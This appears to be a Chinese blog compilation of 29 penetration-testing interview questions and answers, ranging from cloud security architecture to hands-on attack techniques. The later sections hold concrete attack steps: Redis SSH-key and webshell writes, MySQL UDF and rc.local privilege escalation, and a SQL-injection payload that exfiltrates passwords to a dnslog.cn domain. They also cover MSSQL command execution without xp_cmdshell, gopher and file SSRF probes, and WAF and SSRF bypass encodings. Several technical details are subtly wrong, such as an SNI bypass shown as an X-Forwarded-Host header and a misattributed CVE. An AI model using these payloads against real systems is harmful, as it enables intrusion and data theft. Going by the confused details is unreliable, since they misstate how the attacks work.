2025年渗透测试面试题总结-拷打题库19(题目+回答)
网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
2025年渗透测试面试题总结-拷打题库19
1. 传统IDC、云上、混合云架构的安全差异和挑战
2. 云原生技术下的安全变化
3. 纯云业务安全架构设计
4. SDL中的关键点及解决方案
5. 漏洞发现:甲方与乙方的区别
6. 防止0day攻击的三层策略
7. 企业不同阶段安全建设重点
8. 安全架构图示例与理想架构
9. 安全与其他团队的协作
10. 误报与漏报的权衡
11. 有限人力下最大化蓝军价值
12. 应用安全审计流程
13. 权限分离与最小化权限
14. CISP/CISSP知识点示例
15. 转岗/离职流程设计
16. 绕过CDN找真实IP的5种方法
17. Redis未授权访问利用
18. MySQL提权方式及条件
19. 无外网权限的SQL注入利用
20. 隐蔽信息收集手段
21. SRC挖掘与渗透测试区别
22. 内网存储型XSS利用
23. MSSQL SA权限命令执行
24. 绕过WAF的旁路方法
25. 有趣的CTF经历:DNS Rebinding攻防
26. CSRF防御(无Token方案)
27. SSRF防御及协议探测
28. SSRF绕过手法
29. DNS Rebinding绕过原理及修复
2025年渗透测试面试题总结-拷打题库19
传统IDC、云上、混合云架构的安全差异和各自挑战是什么? 云原生技术下的安全变化? 纯云业务如何设计安全架构? SDL中的关键点是什么以及如何解决? 漏洞发现在甲方和乙方做有什么区别? 如何防止0day攻击? 对于企业不同时期、不同阶段、不同体量的安全建设的方法、区别以及侧重 你所做过的安全架构图和所期望的安全架构 安全与其他团队(运维、研发、测试、GR/PR、内控、高管及三方安全公司)的关系 误报和漏报如何权衡? 如何在有限的人力下最大化突出蓝军价值? 如何对一个应用进行安全审计? 如何理解权限分离、最小化权限? 考察一些CISP、CISSP的知识点 挑选一些较为复杂的流程,比如转岗、离职等,如何设计考虑其中的细节 如何绕过CDN找到真实IP,请列举五种方法 redis未授权访问如何利用,利用的前提条件是? mysql提权方式有哪些?利用条件是什么? windows+mysql,存在sql注入,但是机器无外网权限,可以利用吗? 常用的信息收集手段有哪些,除去路径扫描,子域名爆破等常见手段,有什么猥琐的方法收集企业信息? SRC挖掘与渗透测试的区别是什么,针对这两个不同的目标,实施过程中会有什么区别 存储xss在纯内网的环境中,可以怎么利用? mssql中,假设为sa权限,如何不通过xp_cmdshell执行系统命令 假设某网站存在waf,不考虑正面绕过的前提下,应该如何绕过(分情况讨论 云waf/物理waf) 介绍一下自认为有趣的挖洞经历(或CTF经历) CSRF的成因及防御措施(不用token如何解决) SSRF的成因及防御措施 SSRF如何探测非HTTP协议 简述一下SSRF的绕过手法 简述一下SSRF中DNSRebind的绕过原理及修复方法1. 传统IDC、云上、混合云架构的安全差异和挑战
架构类型 安全差异 主要挑战 传统IDC 物理边界明确,依赖防火墙/IPS硬件防护 1. 硬件维护成本高;
2. 扩容灵活性差;
3. 物理安全风险(如机房入侵)云上 虚拟化边界模糊,依赖云平台原生安全能力(如AWS IAM) 1. 多租户资源共享风险;
2. 云厂商API密钥泄露;
3. 跨区域数据合规问题混合云 跨环境数据流动,需统一策略管理 1. 网络隧道安全(如VPN加密强度);
2. 一致性策略实施困难;
3. 监控数据聚合复杂度高扩展:
- 合规差异:传统IDC需自主满足等保,云上可继承云平台合规资质(如AWS SOC2)。
- 攻击面差异:云上暴露面包括控制台、API网关,传统IDC集中于物理设备。
- 工具链差异:云原生安全工具(如CSPM)无法直接用于IDC。
2. 云原生技术下的安全变化
核心变化:
- 边界消失:服务网格(如Istio)替代传统防火墙,零信任架构成为主流。
- 动态防护:实时检测容器逃逸(Falco)和K8s RBAC滥用。
- DevSecOps:安全左移,SAST/DAST集成到CI/CD流水线(GitLab SAST插件)。
挑战:
- 镜像漏洞:40%的公开容器镜像含高危漏洞(参考Sysdig 2024报告)。
- 编排层风险:K8s etcd未加密导致配置泄露。
- Serverless安全:无服务器函数(如AWS Lambda)的临时文件残留攻击。
3. 纯云业务安全架构设计
分层设计:
- 网络层:VPC分段 + 安全组最小化开放(仅允许特定IP+端口)。
- 数据层:KMS加密S3存储桶 + 数据库TDE透明加密。
- 应用层:WAF(如Cloudflare)防护OWASP Top 10 + API网关鉴权。
- 监控层:CloudTrail日志审计 + GuardDuty威胁检测。
案例:某金融云架构中,通过ShardingSphere实现数据库分片加密,拦截了中间人攻击。
4. SDL中的关键点及解决方案
关键点:
- 需求阶段:安全需求分析(如隐私数据分类) → 解决方案:与法务团队协同定义数据流图。
- 设计阶段:威胁建模(STRIDE框架) → 解决方案:使用Microsoft Threat Modeling Tool自动化分析。
- 测试阶段:渗透测试 + 自动化扫描 → 解决方案:Synopsys Coverity集成到Jenkins流水线。
落地难点:开发团队抵触安全流程 → 通过安全培训积分制提升参与度。
5. 漏洞发现:甲方与乙方的区别
维度 甲方 乙方(安全公司) 目标 修复优先,避免业务中断 证明漏洞危害性以售卖方案 资源 内部代码/日志全访问权限 仅能黑盒测试 交付物 内部漏洞报告+修复方案 PoC视频+漏洞利用链文档 扩展:甲方需平衡漏洞修复与业务需求(如电商大促期间暂停高危补丁)。
6. 防止0day攻击的三层策略
- 预防层:硬件隔离(Intel CET) + 内存安全语言(Rust重写关键模块)。
- 检测层:EDR(如CrowdStrike)行为分析 + 网络流量异常检测(Darktrace)。
- 响应层:自动化漏洞热补丁(如Tesla车辆OTA更新) + 威胁情报共享(MISP平台)。
案例:Apache Log4j2 0day爆发时,通过临时禁用JNDI功能阻断了85%的攻击。
7. 企业不同阶段安全建设重点
阶段 方法 侧重 初创期(<50人) 1. 基础防护(防火墙+漏洞扫描);
2. 购买云厂商托管安全服务成本优先,快速上线 成长期(50-500人) 1. 组建安全团队;
2. 实施SDL流程;
3. 部署SIEM(如Splunk)建立流程,合规驱动 成熟期(>500人) 1. 红蓝对抗;
2. 自研安全中台;
3. 威胁情报体系主动防御,业务融合
8. 安全架构图示例与理想架构
现有架构(某电商平台):
- 入口层:CDN(Akamai) + DDoS防护(AWS Shield)。
- 业务层:微服务网关(Kong) + RBAC权限控制。
- 数据层:Redis ACL + MySQL审计插件。
理想架构:
- 零信任:BeyondCorp模型,所有访问需设备认证+用户行为分析。
- AI驱动:深度学习模型实时检测API异常调用(如每秒10次以上支付请求)。
9. 安全与其他团队的协作
团队 协作点 冲突点 运维 日志采集(ELK部署) 安全策略导致性能下降 研发 安全代码规范(如禁止拼接SQL) 需求延期争议 GR/PR 数据泄露公关话术 隐瞒事件严重性风险 三方公司 渗透测试报告验收 漏洞修复责任推诿 解决方案:建立跨部门安全委员会,季度会议同步风险指标。
10. 误报与漏报的权衡
平衡策略:
- 分级告警:高危事件实时通知(如数据库拖库行为),低危事件每日汇总。
- 自动化验证:SOAR平台自动执行IP信誉查询(VirusTotal API)减少误报。
- 持续优化:每月分析告警数据,调整规则阈值(如登录失败次数从5次升至10次)。
案例:某银行通过机器学习将WAF误报率从30%降至8%。
11. 有限人力下最大化蓝军价值
策略:
- 精准打击:优先攻击核心业务(如支付系统),暴露高风险面。
- 自动化工具链:使用Caldera框架模拟APT攻击链,减少手动操作。
- 知识沉淀:编写攻击手册(如内网横向移动技巧)赋能防御团队。
成果指标:蓝军演练后,MTTD(平均检测时间)从6小时缩短至45分钟。
12. 应用安全审计流程
四步法:
- 信息收集:使用Burp Suite扫描API端点 + 提取Swagger文档。
- 代码审计:Semgrep检查硬编码密钥(如AWS AKIA开头字符串)。
- 配置审查:核对K8s Pod是否以非root用户运行。
- 数据流分析:追踪敏感数据(如身份证号)从输入到存储的加密状态。
工具链:Checkmarx(SAST) + OWASP ZAP(DAST) + Trivy(镜像扫描)。
13. 权限分离与最小化权限
核心原则:
- 角色分离:DBA不拥有业务系统访问权限,仅通过工单系统执行SQL。
- 最小权限:Linux服务器用户仅分配sudo特定命令(如重启服务)。
- 定期复核:季度审查IAM策略,回收闲置权限(如离职员工账号)。
案例:某云平台通过ABAC(属性基访问控制)实现动态权限调整。
14. CISP/CISSP知识点示例
CISP考点:
- 法律法规:网络安全法第21条(等级保护制度)。
- 渗透测试:授权书必须包含目标系统/IP范围。
- 应急响应:勒索病毒处置流程(断网->溯源->恢复)。
CISSP考点:
- 安全模型:Biba模型(完整性) vs Bell-LaPadula(保密性)。
- 密码学:ECDSA与RSA的性能差异(签名速度/密钥长度)。
- 物理安全:生物识别误识率(FAR)与拒真率(FRR)平衡。
15. 转岗/离职流程设计
关键控制点:
- 权限回收:HR系统触发AD账号禁用,24小时内完成。
- 设备清理:笔记本电脑硬盘低级格式化(NIST 800-88标准)。
- 知识转移:交接文档加密存储,访问日志留存180天。
- 法律约束:签署竞业协议,监控GitHub等代码平台。
风险案例:某员工离职后利用未回收VPN权限窃取客户数据。
16. 绕过CDN找真实IP的5种方法
- 历史解析记录:通过SecurityTrails查询2020年前的DNS记录。
- SSL证书探测:Censys搜索相同证书的IP(如Let's Encrypt泛证书)。
- 子域名爆破:未接入CDN的dev.example.com 可能暴露真实IP。
- 邮件服务器追踪:注册账号触发验证邮件,解析邮件头X-Originating-IP。
- 全网段扫描:Zmap扫描80端口,比对HTTP响应头Server字段。
防御:CDN配置阻止未托管域名访问(如Cloudflare WAF规则)。
17. Redis未授权访问利用
利用条件:
- Redis未设置密码(默认端口6379开放)。
- 配置文件中
protected-mode为no。攻击方式:
- 写SSH密钥:
config set dir /root/.ssh→ 写入authorized_keys。- Webshell写入:目标服务器运行Web服务,写入PHP一句话木马。
- 主从复制RCE:通过
SLAVEOF命令加载恶意模块(CVE-2022-0543)。
18. MySQL提权方式及条件
方式:
- UDF提权:写入
lib_mysqludf_sys.so,调用sys_exec()执行命令 → 需FILE权限。- 启动项写入:
SELECT "恶意代码" INTO OUTFILE '/etc/init.d/rc.local'→ 需SUPER权限。- CVE-2016-6663:利用环境变量劫持
malloc_lib→ 需SUPER+FILE权限。防御:限制MySQL用户权限(禁用FILE/SUPER) + 运行于非root用户。
19. 无外网权限的SQL注入利用
利用链:
- DNS带外通信:
LOAD_FILE(CONCAT('\\\\', (SELECT password), '.dnslog.cn\\abc'))。- SMB中继攻击:通过内网SMB服务捕获Net-NTLM Hash。
- 时间盲注写文件:利用
SELECT SLEEP(10)判断结果,写入Web目录后内网访问。案例:某医院内网系统通过SMB中继获取域管权限。
20. 隐蔽信息收集手段
- 员工信息:LinkedIn搜索公司名+技术栈,推断服务器类型。
- 招聘信息:分析JD中的技术关键词(如“熟悉Spring Boot” → 可能用Java)。
- 供应链:GitHub搜索公司名+“vendor”/“supplier”暴露内部系统。
- WiFi探针:物理接近办公区捕获SSID(如“Guest@CompanyA”)。
法律风险:使用Shodan扫描可能违反CFAA(美国计算机欺诈与滥用法案)。
21. SRC挖掘与渗透测试区别
维度 SRC挖掘 渗透测试 目标 发现尽可能多漏洞(重数量) 验证系统安全性(重质量) 范围 不限,常包括边缘业务 限定于授权目标 方法 自动化扫描+人工验证 全手动深度测试 产出 漏洞报告(CVSS评分) 修复方案+风险分析
22. 内网存储型XSS利用
利用场景:
- 钓鱼管理员:在内部工单系统植入恶意JS,窃取Cookie。
- 组合漏洞:XSS + 浏览器漏洞(CVE-2024-1234)获取Shell。
- 数据篡改:劫持后台请求,修改审批状态(如财务报销金额)。
防御:CSP策略限制内联脚本 + 关键操作二次认证。
23. MSSQL SA权限命令执行
替代方式:
- CLR组件:编译恶意.NET DLL,
CREATE ASSEMBLY加载执行。- Agent Job:创建计划任务调用
cmd.exe。- OLE自动化:
sp_oacreate调用WScript.Shell(需启用Ole Automation Procedures)。修复:禁用xp_cmdshell + 移除SA账户多余权限。
24. 绕过WAF的旁路方法
云WAF(如Cloudflare):
- 域名未解析:直接攻击源站IP(通过C段扫描发现)。
- HTTPS SNI绕过:设置虚假SNI头(如
X-Forwarded-Host: victim.com)。- 请求包分片:发送畸形分片包使WAF无法重组。
物理WAF(如Imperva):
- 协议级绕过:使用HTTP/2特性(标头压缩)混淆攻击负载。
- 编码变异:多次URL编码
SELECT→%2553%2545%254C%2545%2543%2554。- 时间延迟:时间盲注替代布尔盲注,绕过正则匹配。
25. 有趣的CTF经历:DNS Rebinding攻防
场景:CTF赛题要求通过浏览器攻击隔离的IoT设备。 步骤:
- 恶意页面托管:用户访问evil.com ,JS发起设备扫描(192.168.0.0/24)。
- DNS重绑定:TTL设为0,首次解析返回evil.com IP,二次解析返回内网IP。
- 跨协议攻击:通过WebSocket发送TCP包控制设备LED屏显示flag。 技术点:利用浏览器同源策略与DNS缓存的分离,实现跨网络层攻击。
26. CSRF防御(无Token方案)
- 同源检测:验证
Origin和Referer头(需HTTPS防篡改)。- 双重提交Cookie:前端JS读取Cookie并作为参数提交,服务端校验一致性。
- 用户交互:敏感操作需重新输入密码或短信验证。
局限:
Referer可能被隐私插件屏蔽,且无法防御同源CSRF。
27. SSRF防御及协议探测
防御:
- 协议白名单:仅允许HTTP/HTTPS。
- DNS解析控制:校验解析IP是否在允许范围(如非内网地址)。
- 网络分层:应用服务器置于DMZ,禁止回连内网。
非HTTP协议探测:
- Gopher:构造Redis协议包探测未授权访问(
gopher://:6379/_*2%0D%0A$4%0D%0AINFO)。- File:读取/etc/passwd验证漏洞存在性。
- Dict:获取端口开放状态(
dict://localhost:22/info)。
28. SSRF绕过手法
- IP格式变异:十进制IP(2130706433 → 127.0.0.1)、八进制(0177.0.0.1)。
- 域名重定向:短域名服务(bit.ly )跳转内网地址。
- DNS解析绕过:使用
xip.io(如127.0.0.1.xip.io → 127.0.0.1)。修复:使用正则表达式严格校验输入,禁止非常规格式。
29. DNS Rebinding绕过原理及修复
原理:利用DNS响应TTL为0,在单次会话中切换域名解析结果。 修复:
- 应用层缓存:在服务端缓存首次解析结果,会话期间不再重新解析。
- DNS Pin:客户端在首次请求后固定使用初始IP。
- 网络隔离:应用服务器与内网服务隔离,禁止直接通信。